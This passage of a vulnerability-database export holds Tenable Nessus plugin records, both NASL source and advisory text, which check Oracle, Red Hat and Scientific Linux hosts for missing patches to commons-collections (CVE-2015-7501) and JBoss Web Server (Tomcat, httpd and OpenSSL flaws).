script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:43:06", "description": "Updated packages for the Apache commons-collections library for Red Hat JBoss Enterprise Application Platform 6.4, which fix one security issue, are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.4 on Red Hat Enterprise Linux 5, 6, and 7 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-11-24T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2015:2500)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-eap6", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2015-2500.NASL", "href": "https://www.tenable.com/plugins/nessus/87044", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2500. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87044);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2500\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2015:2500)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages for the Apache commons-collections library for Red\nHat JBoss Enterprise Application Platform 6.4, which fix one security\nissue, are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.4 on Red\nHat Enterprise Linux 5, 6, and 7 are advised to upgrade to these\nupdated packages. 
The JBoss server process must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-collections-eap6 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2500\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! 
(rpm_exists(release:\"RHEL5\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL7\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections-eap6\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:46:09", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific deserialization vulnerability is to remove the vulnerable class files (InvokerTransformer, InstantiateFactory, and InstantiateTransformer) in all commons-collections jar files.
Any manual changes should be tested to avoid unforeseen complications.\n\nAll running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-22T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : jakarta-commons-collections on SL5.x i386/x86_64 (20151221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-debuginfo", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-javadoc", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-tomcat5", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20151221_JAKARTA_COMMONS_COLLECTIONS_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87587", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87587);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n\n script_name(english:\"Scientific Linux Security Update : jakarta-commons-collections on SL5.x i386/x86_64 (20151221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Apache commons-collections library permitted\ncode execution when deserializing
objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-\ncollections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific\ndeserialization vulnerability is to remove the vulnerable class files\n(InvokerTransformer, InstantiateFactory, and InstantiateTransformer)\nin all commons-collections jar files. Any manual changes should be\ntested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1512&L=scientific-linux-errata&F=&S=&P=3803\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45cd4a70\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-debuginfo-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : 
rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:04:10", "description": "An update is now available for Red Hat JBoss Enterprise Web Server 2.1.2 for RHEL 6 and Red Hat JBoss Enterprise Web Server 2.1.2 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nThis release provides an update to httpd, OpenSSL and Tomcat 6/7 for Red Hat JBoss Web Server 2.1.2. The updates are documented in the Release Notes document linked to in the References.\n\nThis release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves as an update for Red Hat JBoss Web Server 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nUsers of Red Hat JBoss Web Server 2 should upgrade to these updated packages, which resolve several security issues.\n\nSecurity Fix(es) :\n\n* It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication.
A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause the httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12615)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12617)\n\n* A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause the httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank OpenVPN for reporting CVE-2016-2183 and Hanno Bock for reporting CVE-2017-9798. Upstream acknowledges Karthikeyan Bhargavan (Inria) and Gaetan Leurent (Inria) as the original reporters of CVE-2016-2183.\n\nBug Fix(es) :\n\n* Corruption in nodestatsmem in multiple core dumps but in different functions of each core dump.
(BZ#1338640)\n\n* mod_cluster segfaults in process_info() due to wrongly generated assembler instruction movslq (BZ#1448709)\n\n* CRL checking of very large CRLs fails with OpenSSL 1.0.2 (BZ#1493075)", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : Red Hat JBoss Web Server (RHSA-2017:3113) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2183", "CVE-2017-12615", "CVE-2017-12617", "CVE-2017-9788", "CVE-2017-9798"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "p-cpe:/a:redhat:enterprise_linux:httpd22", "p-cpe:/a:redhat:enterprise_linux:httpd22-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd22-devel", "p-cpe:/a:redhat:enterprise_linux:httpd22-manual", "p-cpe:/a:redhat:enterprise_linux:httpd22-tools", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-debuginfo", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-devel", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-libs", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-perl", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-static", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native-debuginfo", "p-cpe:/a:redhat:enterprise_linux:mod_ldap", "p-cpe:/a:redhat:enterprise_linux:mod_ldap22", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "p-cpe:/a:redhat:enterprise_linux:mod_ssl22", "p-cpe:/a:redhat:enterprise_linux:tomcat6", "p-cpe:/a:redhat:enterprise_linux:tomcat6-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat6-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:tomcat6-el-2.1-api", "p-cpe:/a:redhat:enterprise_linux:tomcat6-javadoc", 
"p-cpe:/a:redhat:enterprise_linux:tomcat6-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:tomcat6-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat6-log4j", "p-cpe:/a:redhat:enterprise_linux:tomcat6-maven-devel", "p-cpe:/a:redhat:enterprise_linux:tomcat6-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:tomcat6-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat7", "p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j", "p-cpe:/a:redhat:enterprise_linux:tomcat7-maven-devel", "p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2017-3113.NASL", "href": "https://www.tenable.com/plugins/nessus/104456", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:3113. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104456);\n script_version(\"3.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2016-2183\",\n \"CVE-2017-12615\",\n \"CVE-2017-12617\",\n \"CVE-2017-9788\",\n \"CVE-2017-9798\"\n );\n script_xref(name:\"RHSA\", value:\"2017:3113\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"RHEL 6 / 7 : Red Hat JBoss Web Server (RHSA-2017:3113) (Optionsbleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update is now available for Red Hat JBoss Enterprise Web Server\n2.1.2 for RHEL 6 and Red Hat JBoss Enterprise Web Server 2.1.2 for\nRHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL)\nand Transport Layer Security (TLS) protocols, as well as a\nfull-strength general-purpose cryptography library.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nThis release provides an update to httpd, OpenSSL and Tomcat 6/7 for\nRed Hat JBoss Web Server 2.1.2. 
The updates are documented in the\nRelease Notes document linked to in the References.\n\nThis release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves\nas a update for Red Hat JBoss Web Server 2, and includes bug fixes,\nwhich are documented in the Release Notes document linked to in the\nReferences.\n\nUsers of Red Hat JBoss Web Server 2 should upgrade to these updated\npackages, which resolve several security issues.\n\nSecurity Fix(es) :\n\n* It was discovered that the httpd's mod_auth_digest module did not\nproperly initialize memory before using it when processing certain\nheaders related to digest authentication. A remote attacker could\npossibly use this flaw to disclose potentially sensitive information\nor cause httpd child process to crash by sending specially crafted\nrequests to a server. (CVE-2017-9788)\n\n* A vulnerability was discovered in Tomcat where if a servlet context\nwas configured with readonly=false and HTTP PUT requests were allowed,\nan attacker could upload a JSP file to that context and achieve code\nexecution. (CVE-2017-12615)\n\n* A vulnerability was discovered in Tomcat where if a servlet context\nwas configured with readonly=false and HTTP PUT requests were allowed,\nan attacker could upload a JSP file to that context and achieve code\nexecution. (CVE-2017-12617)\n\n* A flaw was found in the way the DES/3DES cipher was used as part of\nthe TLS /SSL protocol. A man-in-the-middle attacker could use this\nflaw to recover some plaintext data by capturing large amounts of\nencrypted traffic between TLS/SSL server and client if the\ncommunication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\n* A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive\nused in an .htaccess file. A remote attacker could possibly use this\nflaw to disclose portions of the server memory, or cause httpd child\nprocess to crash. 
(CVE-2017-9798)\n\nRed Hat would like to thank OpenVPN for reporting CVE-2016-2183 and\nHanno Bock for reporting CVE-2017-9798. Upstream acknowledges\nKarthikeyan Bhargavan (Inria) and Gaetan Leurent (Inria) as the\noriginal reporters of CVE-2016-2183.\n\nBug Fix(es) :\n\n* Corruption in nodestatsmem in multiple core dumps but in different\nfunctions of each core dump. (BZ#1338640)\n\n* mod_cluster segfaults in process_info() due to wrongly generated\nassembler instruction movslq (BZ#1448709)\n\n* CRL checking of very large CRLs fails with OpenSSL 1.0.2\n(BZ#1493075)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/3227901\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017:3113\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-2183\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-12615\");\n script_set_attribute(attribute:\"see_also\", 